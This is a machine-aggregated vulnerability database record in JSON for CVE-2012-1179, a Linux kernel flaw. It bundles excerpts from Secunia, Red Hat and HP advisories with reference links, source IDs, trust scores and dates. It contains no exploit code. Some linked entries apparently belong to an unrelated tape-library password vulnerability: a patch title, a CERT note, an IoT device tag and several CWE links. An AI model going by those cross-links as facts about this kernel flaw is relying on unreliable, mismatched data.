date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n(CVE-2011-4347, Moderate)\n\n* A flaw was found in the way the Linux kernel\u0027s XFS file system\nimplementation handled on-disk Access Control Lists (ACLs). \n(CVE-2012-0038, Moderate)\n\n* It was found that the Linux kernel\u0027s register set (regset) common\ninfrastructure implementation did not check if the required get and set\nhandlers were initialized. Peter Anvin for reporting CVE-2012-1097. \n\nThis update also fixes the following bugs:\n\n* When a RoCE (RDMA over Converged Ethernet) adapter with active RoCE\ncommunications was taken down suddenly (either by adapter failure or the\nintentional shutdown of the interface), the ongoing RoCE communications\ncould cause the kernel to panic and render the machine unusable. A patch\nhas been provided to protect the kernel in this situation and to pass an\nerror up to the application still using the interface after it has been\ntaken down instead. (BZ#799944)\n\n* The fix for Red Hat Bugzilla bug 713494, released via RHSA-2011:0928,\nintroduced a regression. Attempting to change the state of certain\nfeatures, such as GRO (Generic Receive Offload) or TSO (TCP segment\noffloading), for a 10 Gigabit Ethernet card that is being used in a\nvirtual LAN (VLAN) resulted in a kernel panic. (BZ#816974)\n\n* If a new file was created on a Network File System version 4 (NFSv4)\nshare, the ownership was set to nfsnobody (-2) until it was possible to\nupcall to the idmapper. As a consequence, subsequent file system operations\ncould incorrectly use \"-2\" for the user and group IDs for the given file,\ncausing certain operations to fail. In reported cases, this issue also\ncaused \"Viminfo file is not writable\" errors for users running Vim with\nfiles on an NFSv4 share. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04135307\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04135307\nVersion: 1\n\nHPSBGN02970 rev.1 - HP Rapid Deployment Pack (RDP) or HP Insight Control\nServer Deployment, Multiple Remote Vulnerabilities affecting Confidentiality,\nIntegrity and Availability\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-03-10\nLast Updated: 2014-03-10\n\nPotential Security Impact: Multiple remote vulnerabilities affecting\nconfidentiality, integrity and availability\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential vulnerabilities have been identified with HP Rapid Deployment Pack\n(RDP) or HP Insight Control Server Deployment. The vulnerabilities could be\nexploited remotely affecting confidentiality, integrity and availability. \n\nReferences: CVE-2010-4008\n CVE-2010-4494\n CVE-2011-2182\n CVE-2011-2213\n CVE-2011-2492\n\nCVE-2011-2518\n CVE-2011-2689\n CVE-2011-2723\n CVE-2011-3188\n CVE-2011-4077\n\nCVE-2011-4110\n CVE-2012-0058\n CVE-2012-0879\n CVE-2012-1088\n CVE-2012-1179\n\nCVE-2012-2137\n CVE-2012-2313\n CVE-2012-2372\n CVE-2012-2373\n CVE-2012-2375\n\nCVE-2012-2383\n CVE-2012-2384\n CVE-2013-6205\n CVE-2013-6206\n SSRT101443\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nHP Rapid Deployment Pack (RDP) -- All versions\nHP Insight Control Server Deployment -- All versions\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2013-6205    (AV:L/AC:M/Au:S/C:P/I:P/A:P)        4.1\nCVE-2013-6206    (AV:N/AC:L/Au:N/C:C/I:P/A:P)        9.0\nCVE-2010-4008    (AV:N/AC:M/Au:N/C:N/I:N/A:P)        4.3\nCVE-2010-4494    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\nCVE-2011-2182    (AV:L/AC:L/Au:N/C:C/I:C/A:C)        7.2\nCVE-2011-2213    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2011-2492    (AV:L/AC:M/Au:N/C:P/I:N/A:N)        1.9\nCVE-2011-2518    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2011-2689    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2011-2723    (AV:A/AC:M/Au:N/C:N/I:N/A:C)        5.7\nCVE-2011-3188    (AV:N/AC:M/Au:N/C:P/I:P/A:P)        6.8\nCVE-2011-4077    (AV:L/AC:M/Au:N/C:C/I:C/A:C)        6.9\nCVE-2011-4110    (AV:L/AC:L/Au:N/C:N/I:N/A:P)        2.1\nCVE-2012-0058    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2012-0879    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2012-1088    (AV:L/AC:M/Au:N/C:N/I:P/A:P)        3.3\nCVE-2012-1179    (AV:A/AC:M/Au:S/C:N/I:N/A:C)        5.2\nCVE-2012-2137    (AV:L/AC:M/Au:N/C:C/I:C/A:C)        6.9\nCVE-2012-2313    (AV:L/AC:H/Au:N/C:N/I:N/A:P)        1.2\nCVE-2012-2372    (AV:L/AC:M/Au:S/C:N/I:N/A:C)        4.4\nCVE-2012-2373    (AV:L/AC:H/Au:N/C:N/I:N/A:C)        4.0\nCVE-2012-2375    (AV:A/AC:H/Au:N/C:N/I:N/A:C)        4.6\nCVE-2012-2383    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2012-2384    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP recommends that HP Rapid Deployment Pack (RDP) or HP Insight Control\nServer Deployment should only be run on private secure networks to prevent\nthe risk of security compromise. \n\nHISTORY\nVersion:1 (rev.1) - 10 March 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2012-1179"
      },
      {
        "db": "CERT/CC",
        "id": "VU#913483"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002454"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-1434"
      },
      {
        "db": "BID",
        "id": "52533"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-1179"
      },
      {
        "db": "PACKETSTORM",
        "id": "113818"
      },
      {
        "db": "PACKETSTORM",
        "id": "112355"
      },
      {
        "db": "PACKETSTORM",
        "id": "112364"
      },
      {
        "db": "PACKETSTORM",
        "id": "114208"
      },
      {
        "db": "PACKETSTORM",
        "id": "125636"
      }
    ],
    "trust": 3.69
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2012-1179",
        "trust": 3.2
      },
      {
        "db": "SECUNIA",
        "id": "48898",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2012/03/15/7",
        "trust": 1.7
      },
      {
        "db": "CERT/CC",
        "id": "VU#913483",
        "trust": 1.4
      },
      {
        "db": "SECUNIA",
        "id": "48404",
        "trust": 1.1
      },
      {
        "db": "SECTRACK",
        "id": "1027084",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002454",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "48987",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "52566",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-1434",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "48403",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "49027",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[OSS-SECURITY] 20120315 CVE-2012-1179 KERNEL: THP: __SPLIT_HUGE_PAGE() MAPCOUNT != PAGE_MAPCOUNT BUG_ON()",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201203-376",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "52533",
        "trust": 0.3
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-1179",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "113818",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "112355",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "112364",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "114208",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "125636",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#913483"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-1434"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-1179"
      },
      {
        "db": "BID",
        "id": "52533"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002454"
      },
      {
        "db": "PACKETSTORM",
        "id": "113818"
      },
      {
        "db": "PACKETSTORM",
        "id": "112355"
      },
      {
        "db": "PACKETSTORM",
        "id": "112364"
      },
      {
        "db": "PACKETSTORM",
        "id": "114208"
      },
      {
        "db": "PACKETSTORM",
        "id": "125636"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201203-376"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-1179"
      }
    ]
  },
  "id": "VAR-201205-0297",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2012-1434"
      }
    ],
    "trust": 1.29791665
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2012-1434"
      }
    ]
  },
  "last_update_date": "2024-07-23T20:51:08.752000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ChangeLog-3.3.1",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v3.x/changelog-3.3.1"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "Quantum Scalar i500, Dell ML6000 and IBM TS3310 Tape Library Preconfigured Password Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/14192"
      },
      {
        "title": "linux-3.3.6",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=43190"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20121042 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120743 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux-ti-omap4 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1446-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-backport-oneiric vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1433-1"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1431-1"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2012-1434"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-1179"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002454"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201203-376"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002454"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-1179"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.kernel.org/pub/linux/kernel/v3.x/changelog-3.3.1"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2012/03/15/7"
      },
      {
        "trust": 1.7,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=803793"
      },
      {
        "trust": 1.7,
        "url": "https://github.com/torvalds/linux/commit/4a1d704194a441bf83c636004a479e01360ec850"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/48898"
      },
      {
        "trust": 1.6,
        "url": "http://www.quantum.com/serviceandsupport/softwareanddocumentationdownloads/si500/index.aspx"
      },
      {
        "trust": 1.6,
        "url": "http://support.dell.com"
      },
      {
        "trust": 1.6,
        "url": "http://www-933.ibm.com/support/fixcentral/"
      },
      {
        "trust": 1.2,
        "url": "http://rhn.redhat.com/errata/rhsa-2012-0743.html"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/48404"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id?1027084"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=139447903326211\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-march/075781.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00021.html"
      },
      {
        "trust": 0.8,
        "url": "http://cwe.mitre.org/data/definitions/552.html"
      },
      {
        "trust": 0.8,
        "url": "http://cwe.mitre.org/data/definitions/200.html"
      },
      {
        "trust": 0.8,
        "url": "http://cwe.mitre.org/data/definitions/352.html"
      },
      {
        "trust": 0.8,
        "url": "http://cwe.mitre.org/data/definitions/259.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1179"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1179"
      },
      {
        "trust": 0.6,
        "url": "http://www.kb.cert.org/vuls/id/913483"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/48403"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/48987"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/49027"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1179"
      },
      {
        "trust": 0.3,
        "url": "http://comments.gmane.org/gmane.linux.kernel.mm/75413"
      },
      {
        "trust": 0.3,
        "url": "http://wiki.openvz.org/download/kernel/rhel6/042stab057.1"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/100163532"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04135307"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2137"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2373"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2012-1179.html"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0044"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2372"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/knowledge/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2012-0044.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/#package"
      },
      {
        "trust": 0.2,
        "url": "http://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1097"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4347"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/264.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2012:1042"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/1446-1/"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=25445"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2136"
      },
      {
        "trust": 0.1,
        "url": "https://docs.redhat.com/docs/en-us/red_hat_enterprise_linux/6/html/6.2_technical_notes/kernel.html#rhsa-2012-0743"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2012-2121.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2012-2136.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2119"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2012-2373.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2012-2119.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2012-2137.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2012-2372.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2123"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2012-2123.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2121"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1431-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0045"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1146"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/3.0.0-19.33"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1090"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4086"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/psi_30_beta_launch"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/48987/#comments"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_intelligence/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48987"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/personal/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/48987/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "https://lists.ubuntu.com/archives/ubuntu-security-announce/2012-may/001672.html"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2012-1042.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2012-1097.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0038"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-4347.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2012-0038.html"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2011-0928.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2383"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0879"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0058"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2518"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2723"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2492"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2689"
      },
      {
        "trust": 0.1,
        "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6205"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4077"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2384"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4008"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2375"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4110"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4494"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6206"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2182"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3188"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2313"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2213"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1088"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#913483"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-1434"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-1179"
      },
      {
        "db": "BID",
        "id": "52533"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002454"
      },
      {
        "db": "PACKETSTORM",
        "id": "113818"
      },
      {
        "db": "PACKETSTORM",
        "id": "112355"
      },
      {
        "db": "PACKETSTORM",
        "id": "112364"
      },
      {
        "db": "PACKETSTORM",
        "id": "114208"
      },
      {
        "db": "PACKETSTORM",
        "id": "125636"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201203-376"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-1179"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#913483"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-1434"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-1179"
      },
      {
        "db": "BID",
        "id": "52533"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002454"
      },
      {
        "db": "PACKETSTORM",
        "id": "113818"
      },
      {
        "db": "PACKETSTORM",
        "id": "112355"
      },
      {
        "db": "PACKETSTORM",
        "id": "112364"
      },
      {
        "db": "PACKETSTORM",
        "id": "114208"
      },
      {
        "db": "PACKETSTORM",
        "id": "125636"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201203-376"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-1179"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2012-03-19T00:00:00",
        "db": "CERT/CC",
        "id": "VU#913483"
      },
      {
        "date": "2012-03-23T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-1434"
      },
      {
        "date": "2012-05-17T00:00:00",
        "db": "VULMON",
        "id": "CVE-2012-1179"
      },
      {
        "date": "2012-03-16T00:00:00",
        "db": "BID",
        "id": "52533"
      },
      {
        "date": "2012-05-18T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2012-002454"
      },
      {
        "date": "2012-06-18T15:26:07",
        "db": "PACKETSTORM",
        "id": "113818"
      },
      {
        "date": "2012-05-01T21:33:44",
        "db": "PACKETSTORM",
        "id": "112355"
      },
      {
        "date": "2012-05-01T05:17:24",
        "db": "PACKETSTORM",
        "id": "112364"
      },
      {
        "date": "2012-06-26T23:44:37",
        "db": "PACKETSTORM",
        "id": "114208"
      },
      {
        "date": "2014-03-11T01:16:40",
        "db": "PACKETSTORM",
        "id": "125636"
      },
      {
        "date": "2012-03-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201203-376"
      },
      {
        "date": "2012-05-17T11:00:37.587000",
        "db": "NVD",
        "id": "CVE-2012-1179"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-07-29T00:00:00",
        "db": "CERT/CC",
        "id": "VU#913483"
      },
      {
        "date": "2012-03-23T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-1434"
      },
      {
        "date": "2017-12-29T00:00:00",
        "db": "VULMON",
        "id": "CVE-2012-1179"
      },
      {
        "date": "2015-04-13T21:22:00",
        "db": "BID",
        "id": "52533"
      },
      {
        "date": "2012-05-18T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2012-002454"
      },
      {
        "date": "2012-05-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201203-376"
      },
      {
